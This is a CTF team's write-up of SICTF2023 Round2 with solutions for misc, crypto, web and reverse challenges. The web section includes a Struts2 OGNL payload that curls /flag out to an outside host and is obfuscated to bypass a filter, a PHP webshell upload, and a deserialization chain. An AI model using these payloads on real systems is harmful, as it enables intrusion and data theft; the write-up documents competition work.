SICTF2023 Round2

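SICTF2023 #Round2 is a cybersecurity competition jointly organized by the School of Information Engineering of Hangzhou Dianzi University and Guangdong Ocean University.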

Rank: 4


MISC

[Sign-in] Welcome

SICTF{Welcome_to_SICTF2023_#Round2}

Pixel_art

LSB steganography: zsteg -E "b1,rgb,lsb,xy" Pixel_art.png > 1.png

Extract the RGB values:

from PIL import Image

img = Image.open('1.png')
width, height = img.size
f = b''
# Walk the image row by row and append each pixel's channel values as raw bytes
for i in range(0, height):
    for j in range(0, width):
        tmp = img.getpixel((j, i))
        f += bytes(list(tmp))

print(f)

# b'..................!?!!.?..................?.?!.?....!.?.......!?!!.?!!!!!!?.?!.?!!!.!!!!!!!!!!!!!.?.........!?!!.?........?.?!.?..!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!!!!!.?...............!?!!.?..............?.?!.?........!.?.................!?!!.?!!!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!...!.......!.!!!!!!!.?.............!?!!.?............?.?!.?........................!.....!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!!!.....!.!!!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?..............!.!!!!!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!.................!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!...............!.?.............!?!!.?............?.?!.?......................!.....!.!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?......!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!.!!!!!!!!!!!!!!!!!!!.............!.!!!!!!!!!!!!!!!!!!!...........!.!.............!.!!!!!!!!!!!!!!!!!...........!.?...............!?!!.?..............?.?!.?!.!!!!!.!!!!!.......!.!!!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!.!.?.................!?!!.?................?.?!.?............!.?.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

Decode it with an online Ook! decoder to get the flag: SICTF{0141ac35-ec19-4cee-a906-22805fdbed77}
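The online decoding step can also be done offline. The following is an added example, not part of the original write-up: it translates the "short Ook!" form (only the characters . ? !) into Brainfuck and runs it with a step limit. The sample input is constructed in the style of the dump above.

```python
OOK_TO_BF = {
    "..": "+", "!!": "-", ".?": ">", "?.": "<",
    "!?": "[", "?!": "]", "!.": ".", ".!": ",",
}

def short_ook_to_bf(data: bytes) -> str:
    # Keep only the three Ook! symbols; this also drops trailing NUL padding.
    symbols = [chr(b) for b in data if b in b".?!"]
    if len(symbols) % 2:
        raise ValueError("odd number of Ook! symbols")
    pairs = [symbols[i] + symbols[i + 1] for i in range(0, len(symbols), 2)]
    if "??" in pairs:
        raise ValueError("'??' is not a valid Ook! pair")
    return "".join(OOK_TO_BF[p] for p in pairs)

def run_bf(code: str, max_steps: int = 1_000_000) -> bytes:
    stack, jump = [], {}          # pre-compute matching brackets
    for pos, op in enumerate(code):
        if op == "[":
            stack.append(pos)
        elif op == "]":
            if not stack:
                raise ValueError("unbalanced ]")
            jump[pos] = stack.pop()
            jump[jump[pos]] = pos
    if stack:
        raise ValueError("unbalanced [")
    tape, ptr, pc, steps, out = [0] * 30000, 0, 0, 0, bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        op = code[pc]
        if op in "+-":
            tape[ptr] = (tape[ptr] + (1 if op == "+" else -1)) % 256
        elif op in "<>":
            ptr = (ptr + (1 if op == ">" else -1)) % len(tape)
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = 0         # no input stream in this example
        elif (op == "[" and tape[ptr] == 0) or (op == "]" and tape[ptr] != 0):
            pc = jump[pc]
        pc += 1
    return bytes(out)

# Constructed sample in the same style as the dump above; it prints two characters.
SAMPLE = (b"." * 18 + b"!?!!.?" + b"." * 18 + b"?.?!.?" + b"....!." + b"?." + b"." * 6
          + b"!?!!.?" + b"!" * 6 + b"?.?!.?" + b"!!!." + b"\x00" * 4)
print(run_bf(short_ook_to_bf(SAMPLE)))
```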

Log In Together? (一起上号不)

Cobalt Strike traffic analysis; reference: https://blog.scrt.ch/2023/04/01/hex-filtrate/

Extract the key from the last stream and parse the cookie:

python3 cs-decrypt-metadata.py U8jm3+oqzYLuUiRd9F3s7xVz7fGnHQYIKF9ch6GRseWfcBSSk+aGhWP3ZUyHIkwRo1/oDCcKV7LYAp022rCm9bC7niOgMlsvgLRolMKIz+Eq5hCyQ0QVScH8jDYsJsCyVw1iaTf5a7gHixIDrSbTp/GiPQIwcTNZBXIJrll540s= -f key

With the raw key in hand, analyze the capture file:

python3 cs-parse-traffic.py -r 1ddb06c55884caf491bdb370ca48389c 11.pcapng

This gives the flag: SICTF{88a39373-e204-43b6-b321-33ac8972fde9}

baby_zip

Partial known-plaintext attack; 1.png holds the first 18 bytes of a PNG image:

rbkcrack -C flag.zip -c flag.png -p 1.png

Once the keys are recovered, extract the file:

rbkcrack -C flag.zip -c flag.png -k 6424c164 7c334afd f99666e5 -d flag.png

flag: SICTF{3a4998b8-345e-4943-a689-d01e8b08defb}

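Still Not Logging In (还不上号)

flag1.pcapng is Behinder (冰蝎) traffic and flag2.pcapng is CS traffic.

Start with flag2.pcapng: extract key.zip and unzip it. The key file contains zero-width character steganography, which yields cd52f1488563bf0e, the key for the Behinder traffic.

For flag1.pcapng, reuse the decryption code from Easy_Shark: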

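<?php
// AES key recovered from the zero-width steganography in the key file
$key="cd52f1488563bf0e";
// Base64 body copied from a captured response
$post="...";
$post=openssl_decrypt($post, "AES128", $key);
print_r(base64_decode(json_decode($post, true)['msg']));
?>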

Feed in the base64 strings from the response packets to get the decrypted content of each stream:

# Stream 2
dvwa_email.png
flag.txt
key
shell.php

# Stream 4
SICTF{79e1755e-08a8-4d

# Stream 6
rO0ABXNyABRzbGVlcC5ydW50aW1lLlNjYWxhcryvNaxLcOBGAwADTAAFYXJyYXl0ABtMc2xlZXAv
cnVudGltZS9TY2FsYXJBcnJheTtMAARoYXNodAAaTHNsZWVwL3J1bnRpbWUvU2NhbGFySGFzaDtM
AAV2YWx1ZXQAGkxzbGVlcC9ydW50aW1lL1NjYWxhclR5cGU7eHBzcgAec2xlZXAuZW5naW5lLnR5
cGVzLk9iamVjdFZhbHVluXko22Ba54kCAAFMAAV2YWx1ZXQAEkxqYXZhL2xhbmcvT2JqZWN0O3hw
c3IAFWphdmEuc2VjdXJpdHkuS2V5UGFpcpcDDDrSzRKTAgACTAAKcHJpdmF0ZUtleXQAGkxqYXZh
L3NlY3VyaXR5L1ByaXZhdGVLZXk7TAAJcHVibGljS2V5dAAZTGphdmEvc2VjdXJpdHkvUHVibGlj
S2V5O3hwc3IAFGphdmEuc2VjdXJpdHkuS2V5UmVwvflPs4iapUMCAARMAAlhbGdvcml0aG10ABJM
amF2YS9sYW5nL1N0cmluZztbAAdlbmNvZGVkdAACW0JMAAZmb3JtYXRxAH4ADUwABHR5cGV0ABtM
amF2YS9zZWN1cml0eS9LZXlSZXAkVHlwZTt4cHQAA1JTQXVyAAJbQqzzF/gGCFTgAgAAeHAAAAJ6
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAL0M6FR0Cb9dW52Nd5NTA1JUNAs1
thS8iXx6QB+UkN/vRJdfsKS8dnOfNuPuPDCtx26B2j8I1FuTJ1VrrfDkzN585sskmXYronFM98Dx
50vHaadOcDcDdBBqi8gC5/D3iKflX6T9pSL/5PVLfN1EIaFsyAS9jpWX2wGNi3C/QPSrAgMBAAEC
gYAdNhXeGtH4wkWqOhY8aurL+VvTUZjRanJ6C+/FkXCzUWbRVwVV5xMMeZEDNigRw4BZ2HGvJL+f
aMT+o3VMkCYBhGbi2/3RPRgigMG7Aa3LWWtYWsdbw8Mw6aqqbTjDUHrQ1kulMf1JvXJL5LBd+pBA
Q8kHaYJRMcmnLsT4NeXOFQJBAMNa2r+phrThTlagMB6bj6vl0IVbDy+TJT2VybCSJ76rPgVUQwtP
yX3z7UAjt27mE8KK+k7Jidi0drCEPv5Wo60CQQD3vQbO64fko1dlatkNn095GO9KoCuanrsLs+vY
Ohc0ltk4EhHHmP5hEE6dSMZNASKaN0wSYJ14xjnA+dJWOES3AkEApzyYF4vhLefTUIVBrHIvxFCw
+fjCP1AQiXA5gVcdfzTJm3ZPDtf2/kRbzpTE68M7F0gykFAoGcQj92i/JKy24QJAdyVbA+M07Ro9
qxHzJ+EJmMUMOMjFj8xtStiSQeDWTj2KZLQUBvmmxcnQ9UYN0PUNzjtwA5qhwXccSZoctcjECwJA
Zc0TZgGq/OwgnIyj/1+Q9D0A2eg3aw1k+6Vzkf/DdkuF6+XTkYTlBGiETIK/vm1rCH4NcOCL7eK5
qpA1grg+gnQABlBLQ1MjOH5yABlqYXZhLnNlY3VyaXR5LktleVJlcCRUeXBlAAAAAAAAAAASAAB4
cgAOamF2YS5sYW5nLkVudW0AAAAAAAAAABIAAHhwdAAHUFJJVkFURXNxAH4ADHEAfgARdXEAfgAS
AAAAojCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAvQzoVHQJv11bnY13k1MDUlQ0CzW2FLyJ
fHpAH5SQ3+9El1+wpLx2c5824+48MK3HboHaPwjUW5MnVWut8OTM3nzmyySZdiuicUz3wPHnS8dp
p05wNwN0EGqLyALn8PeIp+VfpP2lIv/k9Ut83UQhoWzIBL2OlZfbAY2LcL9A9KsCAwEAAXQABVgu
NTA5fnEAfgAVdAAGUFVCTElDcHB4

Save stream 6; it is the actual key for flag2.pcapng.

Back in flag2.pcapng, parse the cookie:

python3 cs-decrypt-metadata.py j+ojKDVPlCr7lT9yzNinkj1DgdkcRaLMT2kL4U+9TvdFBZqGKk7/4WF/W7JhEieC3DoRfngRppMAVHa3yfhp4HZm/ZeNY4bc8rlYL11Q0dXDzpR5JjhqN+hGe9RBqPznoukShgQLhxT/DO7djxE5ROzi6NC52yZAaGPCSeLDyjg= -f realkey

With the raw key in hand, analyze the capture file:

python3 cs-parse-traffic.py -r dfc36399da501802482005cf8c768086 flag2.pcapng

The key content recovered:

F 0 09/06/2023 15:52:58 GNSC2OJTHA2S2NDDGA2TIMJVGQ4TSOJVPU======

Base32-decoding it gives the second half of the flag: 3d-9385-4c0541549995}

flag: SICTF{79e1755e-08a8-4d3d-9385-4c0541549995}

Easy_Shark

Behinder traffic; reconstruct the decryption from the PHP encryption logic in the first stream:

<?php
// AES key taken from the PHP code in the first stream
$key="2295d22e2d70888f";
// Base64 body copied from a captured response
$post="...";
$post=openssl_decrypt($post, "AES128", $key);
print_r(base64_decode(json_decode($post, true)['msg']));
?>

Feed in the base64 strings from the response packets to get the decrypted content of each stream:

GronKey.txt
dvwa_email.png
flag.txt
shell.php

# flag.txt
TGLBOMSJNSRAJAZDEZXGHSJNZWHG

# GronKey.txt
1,50,61,8,9,20,63,41

Gronsfeld cipher; convert the numeric key into the equivalent Vigenere key:

import string

s = [1,50,61,8,9,20,63,41]
dic = string.ascii_lowercase
key = ''
# Each key number is a shift; reduce it mod 26 and write it as a letter
for k in s:
    key += dic[k%26]
print(key)

# byjijulp

Vigenere decryption gives SICTFSHUMUISAGOODBOYYYYYYYYY

flag: SICTF{SHUMUISAGOODBOYYYYYYYYY}
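The Gronsfeld step can also be done directly, without converting the key and using an online Vigenere tool. The following is an added example, not part of the original write-up; the ciphertext and key are the flag.txt and GronKey.txt values shown above, and the function names are illustrative.

```python
import string

UPPER = string.ascii_uppercase

def gronsfeld(text, key, decrypt=True):
    """Shift each letter by the next key number (the key repeats)."""
    out, used = [], 0
    for ch in text:
        if not (ch.isascii() and ch.isalpha()):
            out.append(ch)          # non-letters pass through, no key consumed
            continue
        shift = key[used % len(key)] % 26   # numbers above 25 wrap around
        used += 1
        idx = (UPPER.index(ch.upper()) + (-shift if decrypt else shift)) % 26
        out.append(UPPER[idx] if ch.isupper() else UPPER[idx].lower())
    return "".join(out)

def equivalent_vigenere_key(key):
    """The letter key that produces the same shifts as the numeric key."""
    return "".join(string.ascii_lowercase[k % 26] for k in key)

CIPHERTEXT = "TGLBOMSJNSRAJAZDEZXGHSJNZWHG"   # flag.txt, from the write-up
KEY = [1, 50, 61, 8, 9, 20, 63, 41]           # GronKey.txt, from the write-up

if __name__ == "__main__":
    print(equivalent_vigenere_key(KEY))
    print(gronsfeld(CIPHERTEXT, KEY))
```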

fast_morse

Slow the audio down in Audacity, then run it through an online Morse recognizer to get f2a09bf-7f4a-4269-93a5-c8a48360b03c

QR_QR_QR

An interactive challenge: rebuild a QR code from a string of 0s and 1s, and it goes on for 1000 layers…

from pwn import *
from PIL import Image
from pyzbar.pyzbar import decode

r = remote('210.44.151.51', 10144)

for round_no in range(1000):
    print(round_no)
    # Everything before the "Please" prompt is the QR code, one row of '0'/'1' characters per line
    rows = r.recvuntil(b'Please')[:-7].split(b'\n')

    MAX = len(rows)
    pic = Image.new("RGB", (MAX, MAX))
    s = b''.join(rows)
    idx = 0
    for y in range(0, MAX):
        for x in range(0, MAX):
            # '0' is drawn black, anything else white
            if s[idx] == ord('0'):
                pic.putpixel((x, y), (0, 0, 0))
            else:
                pic.putpixel((x, y), (255, 255, 255))
            idx = idx + 1
    pic.save("flag.png")

    decoded_qr = decode(Image.open("flag.png"))
    data = decoded_qr[0].data
    print(data)

    r.sendlineafter(b'code:', data)
    print(r.recvline())

r.interactive()

Survey (问卷调查)

SICTF{SICTF_Round3_will_do_even_better!}

CRYPTO

[Sign-in] Classical Hodgepodge (古典大杂烩)

base100-base62-base64-base58-base32-base62

SICTF{fe853b49-8730-462e-86f5-fc8e9789f077}

Radio

CRT

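# n1, n2, n3, c1, c2, c3 are the challenge values (omitted in this write-up)
n1 =
n2 =
n3 =
c1 =
c2 =
c3 =
e = 17

# Combine the three ciphertexts with CRT, then take the integer e-th root
mm = crt([c1,c2,c3],[n1,n2,n3])
m = mm.nth_root(e, truncate_mode=True)
print(bytes.fromhex(hex(m[0])[2:]))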

# b'SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}'

MingTianPao

MTP

import Crypto.Util.strxor as xo
import codecs, numpy as np

def isChr(x):
    if ord('a') <= x and x <= ord('z'): return True
    if ord('A') <= x and x <= ord('Z'): return True
    return False


def infer(index, pos):
    # Guess that plaintext `index` has a space at `pos` and derive that column for every other plaintext
    if msg[index, pos] != 0:
        return
    msg[index, pos] = ord(' ')
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

def know(index, pos, ch):
    # Fix one known plaintext character by hand and propagate it down the column
    msg[index, pos] = ord(ch)
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


dat = []

def getSpace():
    # A space XORed with a letter is still a letter, so count letter-like bytes at each position
    for index, x in enumerate(c):
        res = [xo.strxor(x, y) for y in c if x!=y]
        f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
        for pos in range(len(x)):
            dat.append((f(pos), index, pos))

c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

# Apply the most likely space positions first
dat = sorted(dat)[::-1]
for w, index, pos in dat:
    infer(index, pos)

# Manual corrections after reading the partially recovered text
know(1, 28, 'a')
know(1, 24, 'e')
know(1, 16, 't')
know(0, 10, ' ')
know(0, 12, 'i')

print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))

# Key = ciphertext XOR recovered plaintext
key = xo.strxor(c[0], bytes(int(v) for v in msg[0]))
print(key)

# Little Red Riding Hood promise
# d to obey her mother. The gran
# dmother lived out in the woods
# , a half hour from the village
# . When Little Red Riding Hood
# entered the woods a wolf came
# up to her. She did not know wh
# at a wicked animal he was, and
# was not afraid of him. "Good
# day to you, Little Red Riding
# b'SICTF{MTP_AtTack_is_w0nderFu1}'

Easy_CopperSmith

Coppersmith attack with the high bits of p known.

# n, c and ph (the known high bits of p) are the challenge values (omitted in this write-up)
n =
c =
ph =
e = 65537
PR.<x> = PolynomialRing(Zmod(n))
# p = ph * 2^230 + x, where the unknown low part x is below 2^230
f = (ph << 230) + x
pl = f.small_roots(X=2^230, beta=0.48, epsilon=0.02)[0]
p = int((ph << 230) + pl)

q = n//p
phi = (p-1)*(q-1)
d = inverse_mod(e,phi)
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))

# b'SICTF{3f9366ed-b8e4-412f-bbd0-62616a24115c}'

Here Comes the Sign-in Challenge! (签到题来咯!)

Related Message Attack (Franklin-Reiter attack); brute-force the small $e$.

# n, c1 and c2 are the challenge values (omitted in this write-up)
n =
c1 =
c2 =

import binascii

def attack(c1, c2, n, e):
    PR.<x>=PolynomialRing(Zmod(n))
    # Both ciphertexts encrypt affine functions of the same unknown x
    g1 = (114*x+2333)^e - c1
    g2 = (514*x+4555)^e - c2

    # Euclid's algorithm on polynomials; the common factor is x - m
    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()
    return -gcd(g1, g2)[0]

# e is unknown, so try each prime below 2^10 until the result is ASCII
e = 2
while e < 2^10:
    m = attack(c1, c2, n, e)
    m = binascii.unhexlify("%x" % int(m))
    if m.isascii():
        print(m)
        break
    e = next_prime(e)

# SICTF{hhh!!franklin_reiter_is_easy}

small_e

Direct small-$e$ attack

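import gmpy2
e = 3
# c is the challenge ciphertext (omitted in this write-up)
c =
# Take the integer cube root of the ciphertext directly
m = gmpy2.iroot(c,3)[0]
print(bytes.fromhex(hex(m)[2:]))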

# b'SICTF{2ca8e589-4a31-4909-80f0-9ecfc8f8cb37}'
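The Radio and small_e solutions are two cases of the same small-exponent weakness of unpadded RSA: a direct integer root when m^e is smaller than n, and CRT across several moduli when it is not. The following is an added example in plain Python, not part of the original write-up; the moduli are constructed from Mersenne primes and are not the challenge values.

```python
def iroot(x, k):
    """Return (r, exact) where r = floor(x ** (1/k)) and exact means r ** k == x."""
    lo, hi = 0, 1 << (x.bit_length() // k + 1)
    while lo < hi:                      # binary search on integers, no floats
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == x

def crt(residues, moduli):
    """Solve x = r_i (mod n_i) for pairwise-coprime moduli; returns x mod prod(n_i)."""
    x, prod = 0, 1
    for r, n in zip(residues, moduli):
        t = (r - x) * pow(prod, -1, n) % n   # raises ValueError if not coprime
        x, prod = x + prod * t, prod * n
    return x

def small_e_root(c, e):
    """Direct attack: valid only when m ** e was never reduced modulo n."""
    m, exact = iroot(c, e)
    if not exact:
        raise ValueError("not a perfect power: m**e wrapped around the modulus")
    return m

def broadcast_attack(ciphertexts, moduli, e):
    """Same m under several moduli: CRT rebuilds m ** e while it is below prod(n_i)."""
    return small_e_root(crt(ciphertexts, moduli), e)

# Constructed moduli built from Mersenne primes (not the challenge values).
M = [2**p - 1 for p in (127, 61, 107, 89, 521, 31)]
MODULI = [M[0] * M[1], M[2] * M[3], M[4] * M[5]]

def as_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

if __name__ == "__main__":
    msg = int.from_bytes(b"SICTF!", "big")
    cts = [pow(msg, 17, n) for n in MODULI]                    # e = 17 as in Radio
    print(as_bytes(broadcast_attack(cts, MODULI, 17)))
    print(as_bytes(small_e_root(pow(msg, 3, MODULI[0]), 3)))   # e = 3 as in small_e
```

Randomized padding such as OAEP removes both conditions, because the padded message is as large as the modulus and differs for every recipient.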

easy_math

From

$\begin{cases} h_1=a_1p+b_1q \newline h_2=a_2p+b_2q \end{cases}$

eliminating $p$ gives $(a_2b_1-a_1b_2)q=a_2h_1-a_1h_2$. Since $a_1,a_2$ are primes with $a_1,a_2 \in [2^{12},2^{13})$, and $\gcd(a_2h_1-a_1h_2,n)=q$, brute-forcing $a_1,a_2$ recovers $q$.

# n, h1, h2 and c are the challenge values (omitted in this write-up)
n =
h1 =
h2 =
c =

# Collect the primes in [2^12, 2^13)
primes = []
for k in Primes():
    if k>2^13:
        break
    if k>=2^12:
        primes.append(k)

# For the right pair, h1*a2 - h2*a1 is a multiple of q, so its gcd with n reveals q
for i in range(len(primes)):
    for j in range(len(primes)):
        x = abs(h1*primes[i]-h2*primes[j])
        q = gcd(x,n)
        if q > 1:
            print(primes[i],primes[j],q)

# 5953 4241 8358483529150257619757085065272214074629139403939506404958882156637928949429486966229697771519458532207667137987443291952917150640467328461391364839768437

Then solve the RSA as usual to get the flag: SICTF{452aebb6-9c16-441a-ac42-fc608bf6063f}

WEB

[Sign-in] Include

Read /flag with a PHP stream wrapper

?SICTF=php://filter/resource=/flag

Baby_PHP

POST /?k%20e%20y=123%0a&b=phpinfo();

command=print_r(file_get_contents(array_rand(array_flip(scandir(current(localeconv()))))));

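Can You Keep Up with My Speed? (你能跟得上我的speed吗)

Race condition.

Upload 1.php with the content <?php system("cat /flag"); and capture the request in Burp; then request uploads/1.php and capture that request in Burp as well.

Replay both requests 1000 times each in Burp Intruder with null payloads, then look through the results for uploads/1.php for the response with status code 200; that response contains the flag.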

pain

Struts2 OGNL-based RCE vulnerability; reference: https://www.freebuf.com/vuls/217482.html

The S2-012 payload works:

(new java.lang.ProcessBuilder(new java.lang.String[]{"bash", "-c", "curl http://[IP]:[PORT]/?p=`cat /flag`"})).start()

Unicode-escape it to bypass the blacklist keyword filter; then, because the source code calls urldecode, URL-encode it one more layer. Payload:

/start?payload=%5Cu0028%5Cu006e%5Cu0065%5Cu0077%5Cu0020%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072%5Cu0028%5Cu006e%5Cu0065%5Cu0077%5Cu0020%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu005b%5Cu005d%5Cu007b%5Cu0022%5Cu0062%5Cu0061%5Cu0073%5Cu0068%5Cu0022%5Cu002c%5Cu0020%5Cu0022%5Cu002d%5Cu0063%5Cu0022%5Cu002c%5Cu0020%5Cu0022%5Cu0063%5Cu0075%5Cu0072%5Cu006c%5Cu0020%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0031%5Cu0032%5Cu0030%5Cu002e%5Cu0032%5Cu0035%5Cu002e%5Cu0031%5Cu0030%5Cu0034%5Cu002e%5Cu0032%5Cu0030%5Cu0039%5Cu003a%5Cu0038%5Cu0038%5Cu0038%5Cu0038%5Cu002f%5Cu003f%5Cu0070%5Cu003d%5Cu0060%5Cu0063%5Cu0061%5Cu0074%5Cu0020%5Cu002f%5Cu0066%5Cu006c%5Cu0061%5Cu0067%5Cu0060%5Cu0022%5Cu007d%5Cu0029%5Cu0029%5Cu002e%5Cu0073%5Cu0074%5Cu0061%5Cu0072%5Cu0074%5Cu0028%5Cu0029

Result:

210.44.151.51 - - [09/Sep/2023 12:30:07] "GET /?p=SICTF169e8299-2241-4b2e-9726-1c32f212ca51 HTTP/1.1" 200 -
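The bypass works because the keyword filter inspects the request value before the encoding layers are undone. The following is an added example, not code from the challenge or the original write-up, showing a filter that checks the raw string next to one that canonicalizes first and fails closed. The denylist keywords are hypothetical, and the sample is the "ProcessBuilder" fragment of the payload above.

```python
import re
from urllib.parse import unquote

# Hypothetical denylist; the challenge's real keyword list is not shown in the write-up.
DENYLIST = ("ProcessBuilder", "Runtime", "java.lang")

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

def naive_is_blocked(value: str) -> bool:
    """Weak form: inspects the raw string, so any encoding layer hides the keywords."""
    return any(word in value for word in DENYLIST)

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Undo URL-encoding and \\uXXXX escapes repeatedly until the value stops changing."""
    for _ in range(max_rounds):
        decoded = _UNICODE_ESCAPE.sub(
            lambda m: chr(int(m.group(1), 16)), unquote(value))
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def hardened_is_blocked(value: str) -> bool:
    """Check the canonical form; reject input that cannot be canonicalized."""
    try:
        return naive_is_blocked(canonicalize(value))
    except ValueError:
        return True  # fail closed

# Fragment of the payload shown above (the encoded word "ProcessBuilder").
SAMPLE = ("%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073"
          "%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072")

if __name__ == "__main__":
    print("naive filter blocks it:   ", naive_is_blocked(SAMPLE))
    print("hardened filter blocks it:", hardened_is_blocked(SAMPLE))
```

Canonicalizing only repairs the filter; the durable fix for this class of bug is to stop evaluating request parameters as OGNL expressions.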

RCE

POST /

code=include "/flag";

I Want Them All (我全都要)

Build the deserialization chain:

from phpserialize import serialize

class P:
    public_MyLover='x'

# First definition of B: the inner object stored in A's Aec property
class B:
    public_i='1'
    public_nogame=P()

class A:
    public_Aec=B()
    public_girl=['1']
    public_boy=['2']

# B is redefined as the outer object; A already holds an instance of the earlier B
class B:
    public_pop=A()

print(serialize(B()))

# O:1:"B":1:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":2:{s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";s:1:"x";}}s:3:"boy";a:1:{i:0;s:1:"2";}s:4:"girl";a:1:{i:0;s:1:"1";}}}

POST ?A_B_C=O:1:"B":1:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":2:{s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";s:1:"x";}}s:3:"boy";a:1:{i:0;s:1:"2";}s:4:"girl";a:1:{i:0;s:1:"1";}}}

cmd=system("cat /flag");

REVERSE

[Sign-in] PYC

Decompile the pyc to get the flag.

SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}

Myobject

Dynamic debugging shows it is RC4; the key is SIFLAG and the ciphertext is 3027D30E5A22CF47476B0BE58D53BA99C3850707011C7710FE889F

Decrypt the RC4 to get the flag: SICTF{wow_you_get_the_flag}

chbase

Searching the strings gives:

Alphabet table: ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/

Ciphertext: F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9

Base64-decoding gives the flag: SICTF{base64_and_antidebugger}

A Different base64 (不一样的base64)

Unpack with pyinstxtractor to get 111.pyc, then decompile it to get:

U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA

Base64-decoding gives the flag: SICTF{8e0d358d-8b9d-4866-9b02-6749b07ad09a}
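Both base64 challenges above (chbase and this one) can be decoded with one routine. The following is an added example, not part of the original write-up: it maps a custom 64-character table back to the standard alphabet before decoding, and strips the trailing NUL bytes that the second string decodes to. The table and both ciphertexts are the values quoted above; the function name is illustrative.

```python
import base64

STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Table recovered from the chbase binary (upper-case letters reversed).
CHBASE_TABLE = "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/"

def b64decode_with_table(data: str, table: str = STD) -> bytes:
    """Decode base64 text that was produced with a substituted alphabet."""
    if len(table) != 64 or len(set(table)) != 64:
        raise ValueError("table must contain 64 distinct characters")
    body = data.strip().rstrip("=")
    unknown = set(body) - set(table)
    if unknown:
        raise ValueError(f"characters not in table: {sorted(unknown)}")
    # Position i in the custom table corresponds to position i in the standard one.
    standard = body.translate(str.maketrans(table, STD))
    standard += "=" * (-len(standard) % 4)      # restore padding if it was dropped
    return base64.b64decode(standard, validate=True)

CHBASE_CT = "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9"
PYC_CT = "U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA"

def decode_chbase() -> bytes:
    return b64decode_with_table(CHBASE_CT, CHBASE_TABLE)

def decode_pyc_string() -> bytes:
    # The trailing "AA" decodes to NUL bytes, so strip them.
    return b64decode_with_table(PYC_CT).rstrip(b"\x00")

if __name__ == "__main__":
    print(decode_chbase())
    print(decode_pyc_string())
```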

javacode

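JVM bytecode; use the reference "两张图让你快速读懂JVM字节码指令" (Read JVM Bytecode Instructions Quickly with Two Diagrams) to work out the encryption logic. The key and the ciphertext c are known, and the core operation is: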

c[i] = (((m[i]^m[i+1])-k[i])^k[i])%256

Recover the plaintext:

c = [148,136,151,234,177,48,226,234,214,177,168,176,151,250,19,20,253,52,72,176,170,140,176,236,54,231,212,237,135,151,150,135,217,231,229,32,90]
k = list(b'SICTF2023')

import string
dic = string.ascii_letters+string.digits+'_{}'

# The flag starts with 'S' (83); each c[i] ties m[i] to m[i+1], so recover one character at a time
m = [83]

for i in range(len(c)):
    # Try every printable character as the next plaintext byte
    for j in range(33,127):
        if (((m[-1]^j)-k[i%len(k)])^k[i%len(k)])%256 == c[i]:
            m.append(j)
            break

print(bytes(m))

# b'SICTF{OMG_j@vac0de_1s_sO_interesting!}'

PWN

[Sign-in] Shop

Integer overflow vulnerability; enter -1 to get the flag.

FORENSICS

Shopping Trip (购物之旅)

